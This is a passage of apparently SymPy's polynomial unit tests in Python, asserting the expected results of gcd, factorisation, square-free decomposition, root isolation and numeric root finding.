h, s, t = g, 1.0*x + 1.0, 1.0
assert cofactors(f, g) == (h, s, t)
assert gcd(f, g) == h
assert lcm(f, g) == f
assert cofactors(8, 6) == (2, 4, 3)
assert gcd(8, 6) == 2
assert lcm(8, 6) == 24
f, g = x**2 - 3*x - 4, x**3 - 4*x**2 + x - 4
l = x**4 - 3*x**3 - 3*x**2 - 3*x - 4
h, s, t = x - 4, x + 1, x**2 + 1
assert cofactors(f, g, modulus=11) == (h, s, t)
assert gcd(f, g, modulus=11) == h
assert lcm(f, g, modulus=11) == l
f, g = x**2 + 8*x + 7, x**3 + 7*x**2 + x + 7
l = x**4 + 8*x**3 + 8*x**2 + 8*x + 7
h, s, t = x + 7, x + 1, x**2 + 1
assert cofactors(f, g, modulus=11, symmetric=False) == (h, s, t)
assert gcd(f, g, modulus=11, symmetric=False) == h
assert lcm(f, g, modulus=11, symmetric=False) == l
raises(TypeError, lambda: gcd(x))
raises(TypeError, lambda: lcm(x))
def test_gcd_numbers_vs_polys():
assert isinstance(gcd(3, 9), Integer)
assert isinstance(gcd(3*x, 9), Integer)
assert gcd(3, 9) == 3
assert gcd(3*x, 9) == 3
assert isinstance(gcd(S(3)/2, S(9)/4), Rational)
assert isinstance(gcd(S(3)/2*x, S(9)/4), Rational)
assert gcd(S(3)/2, S(9)/4) == S(3)/4
assert gcd(S(3)/2*x, S(9)/4) == 1
assert isinstance(gcd(3.0, 9.0), Float)
assert isinstance(gcd(3.0*x, 9.0), Float)
assert gcd(3.0, 9.0) == 1.0
assert gcd(3.0*x, 9.0) == 1.0
def test_terms_gcd():
assert terms_gcd(1) == 1
assert terms_gcd(1, x) == 1
assert terms_gcd(x - 1) == x - 1
assert terms_gcd(-x - 1) == -x - 1
assert terms_gcd(2*x + 3) == 2*x + 3
assert terms_gcd(6*x + 4) == Mul(2, 3*x + 2, evaluate=False)
assert terms_gcd(x**3*y + x*y**3) == x*y*(x**2 + y**2)
assert terms_gcd(2*x**3*y + 2*x*y**3) == 2*x*y*(x**2 + y**2)
assert terms_gcd(x**3*y/2 + x*y**3/2) == x*y/2*(x**2 + y**2)
assert terms_gcd(x**3*y + 2*x*y**3) == x*y*(x**2 + 2*y**2)
assert terms_gcd(2*x**3*y + 4*x*y**3) == 2*x*y*(x**2 + 2*y**2)
assert terms_gcd(2*x**3*y/3 + 4*x*y**3/5) == 2*x*y/15*(5*x**2 + 6*y**2)
assert terms_gcd(2.0*x**3*y + 4.1*x*y**3) == x*y*(2.0*x**2 + 4.1*y**2)
assert _aresame(terms_gcd(2.0*x + 3), 2.0*x + 3)
assert terms_gcd((3 + 3*x)*(x + x*y), expand=False) == \
(3*x + 3)*(x*y + x)
assert terms_gcd((3 + 3*x)*(x + x*sin(3 + 3*y)), expand=False, deep=True) == \
3*x*(x + 1)*(sin(Mul(3, y + 1, evaluate=False)) + 1)
assert terms_gcd(sin(x + x*y), deep=True) == \
sin(x*(y + 1))
eq = Eq(2*x, 2*y + 2*z*y)
assert terms_gcd(eq) == eq
assert terms_gcd(eq, deep=True) == Eq(2*x, 2*y*(z + 1))
def test_trunc():
f, g = x**5 + 2*x**4 + 3*x**3 + 4*x**2 + 5*x + 6, x**5 - x**4 + x**2 - x
F, G = Poly(f), Poly(g)
assert F.trunc(3) == G
assert trunc(f, 3) == g
assert trunc(f, 3, x) == g
assert trunc(f, 3, (x,)) == g
assert trunc(F, 3) == G
assert trunc(f, 3, polys=True) == G
assert trunc(F, 3, polys=False) == g
f, g = 6*x**5 + 5*x**4 + 4*x**3 + 3*x**2 + 2*x + 1, -x**4 + x**3 - x + 1
F, G = Poly(f), Poly(g)
assert F.trunc(3) == G
assert trunc(f, 3) == g
assert trunc(f, 3, x) == g
assert trunc(f, 3, (x,)) == g
assert trunc(F, 3) == G
assert trunc(f, 3, polys=True) == G
assert trunc(F, 3, polys=False) == g
f = Poly(x**2 + 2*x + 3, modulus=5)
assert f.trunc(2) == Poly(x**2 + 1, modulus=5)
def test_monic():
f, g = 2*x - 1, x - S(1)/2
F, G = Poly(f, domain='QQ'), Poly(g)
assert F.monic() == G
assert monic(f) == g
assert monic(f, x) == g
assert monic(f, (x,)) == g
assert monic(F) == G
assert monic(f, polys=True) == G
assert monic(F, polys=False) == g
raises(ComputationFailed, lambda: monic(4))
assert monic(2*x**2 + 6*x + 4, auto=False) == x**2 + 3*x + 2
raises(ExactQuotientFailed, lambda: monic(2*x + 6*x + 1, auto=False))
assert monic(2.0*x**2 + 6.0*x + 4.0) == 1.0*x**2 + 3.0*x + 2.0
assert monic(2*x**2 + 3*x + 4, modulus=5) == x**2 - x + 2
def test_content():
f, F = 4*x + 2, Poly(4*x + 2)
assert F.content() == 2
assert content(f) == 2
raises(ComputationFailed, lambda: content(4))
f = Poly(2*x, modulus=3)
assert f.content() == 1
def test_primitive():
f, g = 4*x + 2, 2*x + 1
F, G = Poly(f), Poly(g)
assert F.primitive() == (2, G)
assert primitive(f) == (2, g)
assert primitive(f, x) == (2, g)
assert primitive(f, (x,)) == (2, g)
assert primitive(F) == (2, G)
assert primitive(f, polys=True) == (2, G)
assert primitive(F, polys=False) == (2, g)
raises(ComputationFailed, lambda: primitive(4))
f = Poly(2*x, modulus=3)
g = Poly(2.0*x, domain=RR)
assert f.primitive() == (1, f)
assert g.primitive() == (1.0, g)
assert primitive(S('-3*x/4 + y + 11/8')) == \
S('(1/8, -6*x + 8*y + 11)')
def test_compose():
f = x**12 + 20*x**10 + 150*x**8 + 500*x**6 + 625*x**4 - 2*x**3 - 10*x + 9
g = x**4 - 2*x + 9
h = x**3 + 5*x
F, G, H = map(Poly, (f, g, h))
assert G.compose(H) == F
assert compose(g, h) == f
assert compose(g, h, x) == f
assert compose(g, h, (x,)) == f
assert compose(G, H) == F
assert compose(g, h, polys=True) == F
assert compose(G, H, polys=False) == f
assert F.decompose() == [G, H]
assert decompose(f) == [g, h]
assert decompose(f, x) == [g, h]
assert decompose(f, (x,)) == [g, h]
assert decompose(F) == [G, H]
assert decompose(f, polys=True) == [G, H]
assert decompose(F, polys=False) == [g, h]
raises(ComputationFailed, lambda: compose(4, 2))
raises(ComputationFailed, lambda: decompose(4))
assert compose(x**2 - y**2, x - y, x, y) == x**2 - 2*x*y
assert compose(x**2 - y**2, x - y, y, x) == -y**2 + 2*x*y
def test_shift():
assert Poly(x**2 - 2*x + 1, x).shift(2) == Poly(x**2 + 2*x + 1, x)
def test_sturm():
f, F = x, Poly(x, domain='QQ')
g, G = 1, Poly(1, x, domain='QQ')
assert F.sturm() == [F, G]
assert sturm(f) == [f, g]
assert sturm(f, x) == [f, g]
assert sturm(f, (x,)) == [f, g]
assert sturm(F) == [F, G]
assert sturm(f, polys=True) == [F, G]
assert sturm(F, polys=False) == [f, g]
raises(ComputationFailed, lambda: sturm(4))
raises(DomainError, lambda: sturm(f, auto=False))
f = Poly(S(1024)/(15625*pi**8)*x**5
- S(4096)/(625*pi**8)*x**4
+ S(32)/(15625*pi**4)*x**3
- S(128)/(625*pi**4)*x**2
+ S(1)/62500*x
- S(1)/625, x, domain='ZZ(pi)')
assert sturm(f) == \
[Poly(x**3 - 100*x**2 + pi**4/64*x - 25*pi**4/16, x, domain='ZZ(pi)'),
Poly(3*x**2 - 200*x + pi**4/64, x, domain='ZZ(pi)'),
Poly((S(20000)/9 - pi**4/96)*x + 25*pi**4/18, x, domain='ZZ(pi)'),
Poly((-3686400000000*pi**4 - 11520000*pi**8 - 9*pi**12)/(26214400000000 - 245760000*pi**4 + 576*pi**8), x, domain='ZZ(pi)')]
def test_gff():
f = x**5 + 2*x**4 - x**3 - 2*x**2
assert Poly(f).gff_list() == [(Poly(x), 1), (Poly(x + 2), 4)]
assert gff_list(f) == [(x, 1), (x + 2, 4)]
raises(NotImplementedError, lambda: gff(f))
f = x*(x - 1)**3*(x - 2)**2*(x - 4)**2*(x - 5)
assert Poly(f).gff_list() == [(
Poly(x**2 - 5*x + 4), 1), (Poly(x**2 - 5*x + 4), 2), (Poly(x), 3)]
assert gff_list(f) == [(x**2 - 5*x + 4, 1), (x**2 - 5*x + 4, 2), (x, 3)]
raises(NotImplementedError, lambda: gff(f))
def test_sqf_norm():
assert sqf_norm(x**2 - 2, extension=sqrt(3)) == \
(1, x**2 - 2*sqrt(3)*x + 1, x**4 - 10*x**2 + 1)
assert sqf_norm(x**2 - 3, extension=sqrt(2)) == \
(1, x**2 - 2*sqrt(2)*x - 1, x**4 - 10*x**2 + 1)
assert Poly(x**2 - 2, extension=sqrt(3)).sqf_norm() == \
(1, Poly(x**2 - 2*sqrt(3)*x + 1, x, extension=sqrt(3)),
Poly(x**4 - 10*x**2 + 1, x, domain='QQ'))
assert Poly(x**2 - 3, extension=sqrt(2)).sqf_norm() == \
(1, Poly(x**2 - 2*sqrt(2)*x - 1, x, extension=sqrt(2)),
Poly(x**4 - 10*x**2 + 1, x, domain='QQ'))
def test_sqf():
f = x**5 - x**3 - x**2 + 1
g = x**3 + 2*x**2 + 2*x + 1
h = x - 1
p = x**4 + x**3 - x - 1
F, G, H, P = map(Poly, (f, g, h, p))
assert F.sqf_part() == P
assert sqf_part(f) == p
assert sqf_part(f, x) == p
assert sqf_part(f, (x,)) == p
assert sqf_part(F) == P
assert sqf_part(f, polys=True) == P
assert sqf_part(F, polys=False) == p
assert F.sqf_list() == (1, [(G, 1), (H, 2)])
assert sqf_list(f) == (1, [(g, 1), (h, 2)])
assert sqf_list(f, x) == (1, [(g, 1), (h, 2)])
assert sqf_list(f, (x,)) == (1, [(g, 1), (h, 2)])
assert sqf_list(F) == (1, [(G, 1), (H, 2)])
assert sqf_list(f, polys=True) == (1, [(G, 1), (H, 2)])
assert sqf_list(F, polys=False) == (1, [(g, 1), (h, 2)])
assert F.sqf_list_include() == [(G, 1), (H, 2)]
raises(ComputationFailed, lambda: sqf_part(4))
assert sqf(1) == 1
assert sqf_list(1) == (1, [])
assert sqf((2*x**2 + 2)**7) == 128*(x**2 + 1)**7
assert sqf(f) == g*h**2
assert sqf(f, x) == g*h**2
assert sqf(f, (x,)) == g*h**2
d = x**2 + y**2
assert sqf(f/d) == (g*h**2)/d
assert sqf(f/d, x) == (g*h**2)/d
assert sqf(f/d, (x,)) == (g*h**2)/d
assert sqf(x - 1) == x - 1
assert sqf(-x - 1) == -x - 1
assert sqf(x - 1) == x - 1
assert sqf(6*x - 10) == Mul(2, 3*x - 5, evaluate=False)
assert sqf((6*x - 10)/(3*x - 6)) == S(2)/3*((3*x - 5)/(x - 2))
assert sqf(Poly(x**2 - 2*x + 1)) == (x - 1)**2
f = 3 + x - x*(1 + x) + x**2
assert sqf(f) == 3
f = (x**2 + 2*x + 1)**20000000000
assert sqf(f) == (x + 1)**40000000000
assert sqf_list(f) == (1, [(x + 1, 40000000000)])
def test_factor():
f = x**5 - x**3 - x**2 + 1
u = x + 1
v = x - 1
w = x**2 + x + 1
F, U, V, W = map(Poly, (f, u, v, w))
assert F.factor_list() == (1, [(U, 1), (V, 2), (W, 1)])
assert factor_list(f) == (1, [(u, 1), (v, 2), (w, 1)])
assert factor_list(f, x) == (1, [(u, 1), (v, 2), (w, 1)])
assert factor_list(f, (x,)) == (1, [(u, 1), (v, 2), (w, 1)])
assert factor_list(F) == (1, [(U, 1), (V, 2), (W, 1)])
assert factor_list(f, polys=True) == (1, [(U, 1), (V, 2), (W, 1)])
assert factor_list(F, polys=False) == (1, [(u, 1), (v, 2), (w, 1)])
assert F.factor_list_include() == [(U, 1), (V, 2), (W, 1)]
assert factor_list(1) == (1, [])
assert factor_list(6) == (6, [])
assert factor_list(sqrt(3), x) == (1, [(3, S.Half)])
assert factor_list((-1)**x, x) == (1, [(-1, x)])
assert factor_list((2*x)**y, x) == (1, [(2, y), (x, y)])
assert factor_list(sqrt(x*y), x) == (1, [(x*y, S.Half)])
assert factor(6) == 6 and factor(6).is_Integer
assert factor_list(3*x) == (3, [(x, 1)])
assert factor_list(3*x**2) == (3, [(x, 2)])
assert factor(3*x) == 3*x
assert factor(3*x**2) == 3*x**2
assert factor((2*x**2 + 2)**7) == 128*(x**2 + 1)**7
assert factor(f) == u*v**2*w
assert factor(f, x) == u*v**2*w
assert factor(f, (x,)) == u*v**2*w
g, p, q, r = x**2 - y**2, x - y, x + y, x**2 + 1
assert factor(f/g) == (u*v**2*w)/(p*q)
assert factor(f/g, x) == (u*v**2*w)/(p*q)
assert factor(f/g, (x,)) == (u*v**2*w)/(p*q)
p = Symbol('p', positive=True)
i = Symbol('i', integer=True)
r = Symbol('r', real=True)
assert factor(sqrt(x*y)).is_Pow is True
assert factor(sqrt(3*x**2 - 3)) == sqrt(3)*sqrt((x - 1)*(x + 1))
assert factor(sqrt(3*x**2 + 3)) == sqrt(3)*sqrt(x**2 + 1)
assert factor((y*x**2 - y)**i) == y**i*(x - 1)**i*(x + 1)**i
assert factor((y*x**2 + y)**i) == y**i*(x**2 + 1)**i
assert factor((y*x**2 - y)**t) == (y*(x - 1)*(x + 1))**t
assert factor((y*x**2 + y)**t) == (y*(x**2 + 1))**t
f = sqrt(expand((r**2 + 1)*(p + 1)*(p - 1)*(p - 2)**3))
g = sqrt((p - 2)**3*(p - 1))*sqrt(p + 1)*sqrt(r**2 + 1)
assert factor(f) == g
assert factor(g) == g
g = (x - 1)**5*(r**2 + 1)
f = sqrt(expand(g))
assert factor(f) == sqrt(g)
f = Poly(sin(1)*x + 1, x, domain=EX)
assert f.factor_list() == (1, [(f, 1)])
f = x**4 + 1
assert factor(f) == f
assert factor(f, extension=I) == (x**2 - I)*(x**2 + I)
assert factor(f, gaussian=True) == (x**2 - I)*(x**2 + I)
assert factor(
f, extension=sqrt(2)) == (x**2 + sqrt(2)*x + 1)*(x**2 - sqrt(2)*x + 1)
f = x**2 + 2*sqrt(2)*x + 2
assert factor(f, extension=sqrt(2)) == (x + sqrt(2))**2
assert factor(f**3, extension=sqrt(2)) == (x + sqrt(2))**6
assert factor(x**2 - 2*y**2, extension=sqrt(2)) == \
(x + sqrt(2)*y)*(x - sqrt(2)*y)
assert factor(2*x**2 - 4*y**2, extension=sqrt(2)) == \
2*((x + sqrt(2)*y)*(x - sqrt(2)*y))
assert factor(x - 1) == x - 1
assert factor(-x - 1) == -x - 1
assert factor(x - 1) == x - 1
assert factor(6*x - 10) == Mul(2, 3*x - 5, evaluate=False)
assert factor(x**11 + x + 1, modulus=65537, symmetric=True) == \
(x**2 + x + 1)*(x**9 - x**8 + x**6 - x**5 + x**3 - x** 2 + 1)
assert factor(x**11 + x + 1, modulus=65537, symmetric=False) == \
(x**2 + x + 1)*(x**9 + 65536*x**8 + x**6 + 65536*x**5 +
x**3 + 65536*x** 2 + 1)
f = x/pi + x*sin(x)/pi
g = y/(pi**2 + 2*pi + 1) + y*sin(x)/(pi**2 + 2*pi + 1)
assert factor(f) == x*(sin(x) + 1)/pi
assert factor(g) == y*(sin(x) + 1)/(pi + 1)**2
assert factor(Eq(
x**2 + 2*x + 1, x**3 + 1)) == Eq((x + 1)**2, (x + 1)*(x**2 - x + 1))
f = (x**2 - 1)/(x**2 + 4*x + 4)
assert factor(f) == (x + 1)*(x - 1)/(x + 2)**2
assert factor(f, x) == (x + 1)*(x - 1)/(x + 2)**2
f = 3 + x - x*(1 + x) + x**2
assert factor(f) == 3
assert factor(f, x) == 3
assert factor(1/(x**2 + 2*x + 1/x) - 1) == -((1 - x + 2*x**2 +
x**3)/(1 + 2*x**2 + x**3))
assert factor(f, expand=False) == f
raises(PolynomialError, lambda: factor(f, x, expand=False))
raises(FlagError, lambda: factor(x**2 - 1, polys=True))
assert factor([x, Eq(x**2 - y**2, Tuple(x**2 - z**2, 1/x + 1/y))]) == \
[x, Eq((x - y)*(x + y), Tuple((x - z)*(x + z), (x + y)/x/y))]
assert not isinstance(
Poly(x**3 + x + 1).factor_list()[1][0][0], PurePoly) is True
assert isinstance(
PurePoly(x**3 + x + 1).factor_list()[1][0][0], PurePoly) is True
assert factor(sqrt(-x)) == sqrt(-x)
# issue 5917
e = (-2*x*(-x + 1)*(x - 1)*(-x*(-x + 1)*(x - 1) - x*(x - 1)**2)*(x**2*(x -
1) - x*(x - 1) - x) - (-2*x**2*(x - 1)**2 - x*(-x + 1)*(-x*(-x + 1) +
x*(x - 1)))*(x**2*(x - 1)**4 - x*(-x*(-x + 1)*(x - 1) - x*(x - 1)**2)))
assert factor(e) == 0
# deep option
assert factor(sin(x**2 + x) + x, deep=True) == sin(x*(x + 1)) + x
assert factor(sqrt(x**2)) == sqrt(x**2)
def test_factor_large():
f = (x**2 + 4*x + 4)**10000000*(x**2 + 1)*(x**2 + 2*x + 1)**1234567
g = ((x**2 + 2*x + 1)**3000*y**2 + (x**2 + 2*x + 1)**3000*2*y + (
x**2 + 2*x + 1)**3000)
assert factor(f) == (x + 2)**20000000*(x**2 + 1)*(x + 1)**2469134
assert factor(g) == (x + 1)**6000*(y + 1)**2
assert factor_list(
f) == (1, [(x + 1, 2469134), (x + 2, 20000000), (x**2 + 1, 1)])
assert factor_list(g) == (1, [(y + 1, 2), (x + 1, 6000)])
f = (x**2 - y**2)**200000*(x**7 + 1)
g = (x**2 + y**2)**200000*(x**7 + 1)
assert factor(f) == \
(x + 1)*(x - y)**200000*(x + y)**200000*(x**6 - x**5 +
x**4 - x**3 + x**2 - x + 1)
assert factor(g, gaussian=True) == \
(x + 1)*(x - I*y)**200000*(x + I*y)**200000*(x**6 - x**5 +
x**4 - x**3 + x**2 - x + 1)
assert factor_list(f) == \
(1, [(x + 1, 1), (x - y, 200000), (x + y, 200000), (x**6 -
x**5 + x**4 - x**3 + x**2 - x + 1, 1)])
assert factor_list(g, gaussian=True) == \
(1, [(x + 1, 1), (x - I*y, 200000), (x + I*y, 200000), (
x**6 - x**5 + x**4 - x**3 + x**2 - x + 1, 1)])
@XFAIL
def test_factor_noeval():
assert factor(6*x - 10) == 2*(3*x - 5)
assert factor((6*x - 10)/(3*x - 6)) == S(2)/3*((3*x - 5)/(x - 2))
def test_intervals():
assert intervals(0) == []
assert intervals(1) == []
assert intervals(x, sqf=True) == [(0, 0)]
assert intervals(x) == [((0, 0), 1)]
assert intervals(x**128) == [((0, 0), 128)]
assert intervals([x**2, x**4]) == [((0, 0), {0: 2, 1: 4})]
f = Poly((2*x/5 - S(17)/3)*(4*x + S(1)/257))
assert f.intervals(sqf=True) == [(-1, 0), (14, 15)]
assert f.intervals() == [((-1, 0), 1), ((14, 15), 1)]
assert f.intervals(fast=True, sqf=True) == [(-1, 0), (14, 15)]
assert f.intervals(fast=True) == [((-1, 0), 1), ((14, 15), 1)]
assert f.intervals(eps=S(1)/10) == f.intervals(eps=0.1) == \
[((-S(1)/258, 0), 1), ((S(85)/6, S(85)/6), 1)]
assert f.intervals(eps=S(1)/100) == f.intervals(eps=0.01) == \
[((-S(1)/258, 0), 1), ((S(85)/6, S(85)/6), 1)]
assert f.intervals(eps=S(1)/1000) == f.intervals(eps=0.001) == \
[((-S(1)/1002, 0), 1), ((S(85)/6, S(85)/6), 1)]
assert f.intervals(eps=S(1)/10000) == f.intervals(eps=0.0001) == \
[((-S(1)/1028, -S(1)/1028), 1), ((S(85)/6, S(85)/6), 1)]
f = (2*x/5 - S(17)/3)*(4*x + S(1)/257)
assert intervals(f, sqf=True) == [(-1, 0), (14, 15)]
assert intervals(f) == [((-1, 0), 1), ((14, 15), 1)]
assert intervals(f, eps=S(1)/10) == intervals(f, eps=0.1) == \
[((-S(1)/258, 0), 1), ((S(85)/6, S(85)/6), 1)]
assert intervals(f, eps=S(1)/100) == intervals(f, eps=0.01) == \
[((-S(1)/258, 0), 1), ((S(85)/6, S(85)/6), 1)]
assert intervals(f, eps=S(1)/1000) == intervals(f, eps=0.001) == \
[((-S(1)/1002, 0), 1), ((S(85)/6, S(85)/6), 1)]
assert intervals(f, eps=S(1)/10000) == intervals(f, eps=0.0001) == \
[((-S(1)/1028, -S(1)/1028), 1), ((S(85)/6, S(85)/6), 1)]
f = Poly((x**2 - 2)*(x**2 - 3)**7*(x + 1)*(7*x + 3)**3)
assert f.intervals() == \
[((-2, -S(3)/2), 7), ((-S(3)/2, -1), 1),
((-1, -1), 1), ((-1, 0), 3),
((1, S(3)/2), 1), ((S(3)/2, 2), 7)]
assert intervals([x**5 - 200, x**5 - 201]) == \
[((S(75)/26, S(101)/35), {0: 1}), ((S(309)/107, S(26)/9), {1: 1})]
assert intervals([x**5 - 200, x**5 - 201], fast=True) == \
[((S(75)/26, S(101)/35), {0: 1}), ((S(309)/107, S(26)/9), {1: 1})]
assert intervals([x**2 - 200, x**2 - 201]) == \
[((-S(71)/5, -S(85)/6), {1: 1}), ((-S(85)/6, -14), {0: 1}),
((14, S(85)/6), {0: 1}), ((S(85)/6, S(71)/5), {1: 1})]
assert intervals([x + 1, x + 2, x - 1, x + 1, 1, x - 1, x - 1, (x - 2)**2]) == \
[((-2, -2), {1: 1}), ((-1, -1), {0: 1, 3: 1}), ((1, 1), {2:
1, 5: 1, 6: 1}), ((2, 2), {7: 2})]
f, g, h = x**2 - 2, x**4 - 4*x**2 + 4, x - 1
assert intervals(f, inf=S(7)/4, sqf=True) == []
assert intervals(f, inf=S(7)/5, sqf=True) == [(S(7)/5, S(3)/2)]
assert intervals(f, sup=S(7)/4, sqf=True) == [(-2, -1), (1, S(3)/2)]
assert intervals(f, sup=S(7)/5, sqf=True) == [(-2, -1)]
assert intervals(g, inf=S(7)/4) == []
assert intervals(g, inf=S(7)/5) == [((S(7)/5, S(3)/2), 2)]
assert intervals(g, sup=S(7)/4) == [((-2, -1), 2), ((1, S(3)/2), 2)]
assert intervals(g, sup=S(7)/5) == [((-2, -1), 2)]
assert intervals([g, h], inf=S(7)/4) == []
assert intervals([g, h], inf=S(7)/5) == [((S(7)/5, S(3)/2), {0: 2})]
assert intervals([g, h], sup=S(
7)/4) == [((-2, -1), {0: 2}), ((1, 1), {1: 1}), ((1, S(3)/2), {0: 2})]
assert intervals(
[g, h], sup=S(7)/5) == [((-2, -1), {0: 2}), ((1, 1), {1: 1})]
assert intervals([x + 2, x**2 - 2]) == \
[((-2, -2), {0: 1}), ((-2, -1), {1: 1}), ((1, 2), {1: 1})]
assert intervals([x + 2, x**2 - 2], strict=True) == \
[((-2, -2), {0: 1}), ((-S(3)/2, -1), {1: 1}), ((1, 2), {1: 1})]
f = 7*z**4 - 19*z**3 + 20*z**2 + 17*z + 20
assert intervals(f) == []
real_part, complex_part = intervals(f, all=True, sqf=True)
assert real_part == []
assert all(re(a) < re(r) < re(b) and im(
a) < im(r) < im(b) for (a, b), r in zip(complex_part, nroots(f)))
assert complex_part == [(-S(40)/7 - 40*I/7, 0), (-S(40)/7, 40*I/7),
(-40*I/7, S(40)/7), (0, S(40)/7 + 40*I/7)]
real_part, complex_part = intervals(f, all=True, sqf=True, eps=S(1)/10)
assert real_part == []
assert all(re(a) < re(r) < re(b) and im(
a) < im(r) < im(b) for (a, b), r in zip(complex_part, nroots(f)))
raises(ValueError, lambda: intervals(x**2 - 2, eps=10**-100000))
raises(ValueError, lambda: Poly(x**2 - 2).intervals(eps=10**-100000))
raises(
ValueError, lambda: intervals([x**2 - 2, x**2 - 3], eps=10**-100000))
def test_refine_root():
f = Poly(x**2 - 2)
assert f.refine_root(1, 2, steps=0) == (1, 2)
assert f.refine_root(-2, -1, steps=0) == (-2, -1)
assert f.refine_root(1, 2, steps=None) == (1, S(3)/2)
assert f.refine_root(-2, -1, steps=None) == (-S(3)/2, -1)
assert f.refine_root(1, 2, steps=1) == (1, S(3)/2)
assert f.refine_root(-2, -1, steps=1) == (-S(3)/2, -1)
assert f.refine_root(1, 2, steps=1, fast=True) == (1, S(3)/2)
assert f.refine_root(-2, -1, steps=1, fast=True) == (-S(3)/2, -1)
assert f.refine_root(1, 2, eps=S(1)/100) == (S(24)/17, S(17)/12)
assert f.refine_root(1, 2, eps=1e-2) == (S(24)/17, S(17)/12)
raises(PolynomialError, lambda: (f**2).refine_root(1, 2, check_sqf=True))
raises(RefinementFailed, lambda: (f**2).refine_root(1, 2))
raises(RefinementFailed, lambda: (f**2).refine_root(2, 3))
f = x**2 - 2
assert refine_root(f, 1, 2, steps=1) == (1, S(3)/2)
assert refine_root(f, -2, -1, steps=1) == (-S(3)/2, -1)
assert refine_root(f, 1, 2, steps=1, fast=True) == (1, S(3)/2)
assert refine_root(f, -2, -1, steps=1, fast=True) == (-S(3)/2, -1)
assert refine_root(f, 1, 2, eps=S(1)/100) == (S(24)/17, S(17)/12)
assert refine_root(f, 1, 2, eps=1e-2) == (S(24)/17, S(17)/12)
raises(PolynomialError, lambda: refine_root(1, 7, 8, eps=S(1)/100))
raises(ValueError, lambda: Poly(f).refine_root(1, 2, eps=10**-100000))
raises(ValueError, lambda: refine_root(f, 1, 2, eps=10**-100000))
def test_count_roots():
assert count_roots(x**2 - 2) == 2
assert count_roots(x**2 - 2, inf=-oo) == 2
assert count_roots(x**2 - 2, sup=+oo) == 2
assert count_roots(x**2 - 2, inf=-oo, sup=+oo) == 2
assert count_roots(x**2 - 2, inf=-2) == 2
assert count_roots(x**2 - 2, inf=-1) == 1
assert count_roots(x**2 - 2, sup=1) == 1
assert count_roots(x**2 - 2, sup=2) == 2
assert count_roots(x**2 - 2, inf=-1, sup=1) == 0
assert count_roots(x**2 - 2, inf=-2, sup=2) == 2
assert count_roots(x**2 - 2, inf=-1, sup=1) == 0
assert count_roots(x**2 - 2, inf=-2, sup=2) == 2
assert count_roots(x**2 + 2) == 0
assert count_roots(x**2 + 2, inf=-2*I) == 2
assert count_roots(x**2 + 2, sup=+2*I) == 2
assert count_roots(x**2 + 2, inf=-2*I, sup=+2*I) == 2
assert count_roots(x**2 + 2, inf=0) == 0
assert count_roots(x**2 + 2, sup=0) == 0
assert count_roots(x**2 + 2, inf=-I) == 1
assert count_roots(x**2 + 2, sup=+I) == 1
assert count_roots(x**2 + 2, inf=+I/2, sup=+I) == 0
assert count_roots(x**2 + 2, inf=-I, sup=-I/2) == 0
raises(PolynomialError, lambda: count_roots(1))
def test_Poly_root():
f = Poly(2*x**3 - 7*x**2 + 4*x + 4)
assert f.root(0) == -S(1)/2
assert f.root(1) == 2
assert f.root(2) == 2
raises(IndexError, lambda: f.root(3))
assert Poly(x**5 + x + 1).root(0) == RootOf(x**3 - x**2 + 1, 0)
def test_real_roots():
assert real_roots(x) == [0]
assert real_roots(x, multiple=False) == [(0, 1)]
assert real_roots(x**3) == [0, 0, 0]
assert real_roots(x**3, multiple=False) == [(0, 3)]
assert real_roots(x*(x**3 + x + 3)) == [RootOf(x**3 + x + 3, 0), 0]
assert real_roots(x*(x**3 + x + 3), multiple=False) == [(RootOf(
x**3 + x + 3, 0), 1), (0, 1)]
assert real_roots(
x**3*(x**3 + x + 3)) == [RootOf(x**3 + x + 3, 0), 0, 0, 0]
assert real_roots(x**3*(x**3 + x + 3), multiple=False) == [(RootOf(
x**3 + x + 3, 0), 1), (0, 3)]
f = 2*x**3 - 7*x**2 + 4*x + 4
g = x**3 + x + 1
assert Poly(f).real_roots() == [-S(1)/2, 2, 2]
assert Poly(g).real_roots() == [RootOf(g, 0)]
def test_all_roots():
f = 2*x**3 - 7*x**2 + 4*x + 4
g = x**3 + x + 1
assert Poly(f).all_roots() == [-S(1)/2, 2, 2]
assert Poly(g).all_roots() == [RootOf(g, 0), RootOf(g, 1), RootOf(g, 2)]
def test_nroots():
assert Poly(0, x).nroots() == []
assert Poly(1, x).nroots() == []
assert Poly(x**2 - 1, x).nroots() == [-1.0, 1.0]
assert Poly(x**2 + 1, x).nroots() == [-1.0*I, 1.0*I]
roots = Poly(x**2 - 1, x).nroots()
assert roots == [-1.0, 1.0]
roots = Poly(x**2 + 1, x).nroots()
assert roots == [-1.0*I, 1.0*I]
roots = Poly(x**2/3 - S(1)/3, x).nroots()
assert roots == [-1.0, 1.0]
roots = Poly(x**2/3 + S(1)/3, x).nroots()
assert roots == [-1.0*I, 1.0*I]
assert Poly(x**2 + 2*I, x).nroots() == [-1.0 + 1.0*I, 1.0 - 1.0*I]
assert Poly(
x**2 + 2*I, x, extension=I).nroots() == [-1.0 + 1.0*I, 1.0 - 1.0*I]
assert Poly(0.2*x + 0.1).nroots() == [-0.5]
roots = nroots(x**5 + x + 1, n=5)
eps = Float("1e-5")
assert re(roots[0]).epsilon_eq(-0.75487, eps) is S.true
assert im(roots[0]) == 0.0
assert re(roots[1]) == -0.5
assert im(roots[1]).epsilon_eq(-0.86602, eps) is S.true
assert re(roots[2]) == -0.5
assert im(roots[2]).epsilon_eq(+0.86602, eps) is S.true
assert re(roots[3]).epsilon_eq(+0.87743, eps) is S.true
assert im(roots[3]).epsilon_eq(-0.74486, eps) is S.true
assert re(roots[4]).epsilon_eq(+0.87743, eps) is S.true
assert im(roots[4]).epsilon_eq(+0.74486, eps) is S.true
eps = Float("1e-6")
assert re(roots[0]).epsilon_eq(-0.75487, eps) is S.false
assert im(roots[0]) == 0.0
assert re(roots[1]) == -0.5
assert im(roots[1]).epsilon_eq(-0.86602, eps) is S.false
assert re(roots[2]) == -0.5
assert im(roots[2]).epsilon_eq(+0.86602, eps) is S.false
assert re(roots[3]).epsilon_eq(+0.87743, eps) is S.false
assert im(roots[3]).epsilon_eq(-0.74486, eps) is S.false
assert re(roots[4]).epsilon_eq(+0.87743, eps) is S.false
assert im(roots[4]).epsilon_eq(+0.74486, eps) is S.false
raises(DomainError, lambda: Poly(x + y, x).nroots())
raises(MultivariatePolynomialError, lambda: Poly(x + y).nroots())
assert nroots(x**2 - 1) == [-1.0, 1.0]
roots = nroots(x**2 - 1)
assert roots == [-1.0, 1.0]
assert nroots(x + I) == [-1.0*I]
assert nroots(x + 2*I) == [-2.0*I]
raises(PolynomialError, lambda: nroots(0))
